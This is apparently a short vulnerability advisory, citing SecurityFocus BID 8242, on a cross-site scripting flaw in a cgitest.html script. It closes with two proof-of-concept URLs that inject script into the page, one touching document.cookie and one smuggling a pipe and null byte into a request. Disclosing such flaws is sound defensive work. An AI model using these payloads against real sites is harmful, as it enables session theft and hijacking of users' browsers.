9 lines
No EOL
593 B
Text
9 lines
No EOL
593 B
Text
source: https://www.securityfocus.com/bid/8242/info
|
|
|
|
cgitest.html has been reported prone to cross-site scripting attacks. The issue occurs due to a lack of sufficient sanitization performed on data supplied to the cgitest.html script.
|
|
|
|
This issue could be exploited to cause hostile HTML and script code to be rendered in the browser of a user who is enticed to visit a malicious link to the vulnerable script.
|
|
|
|
http://www.example.com/cgitest.html?<script>wi ndow.location="/cgi-bin/cgitest.exe?|<blahblah>%00";</script>
|
|
|
|
http://www.example.com/cgitest.html?<script>(document.cookie)</script> |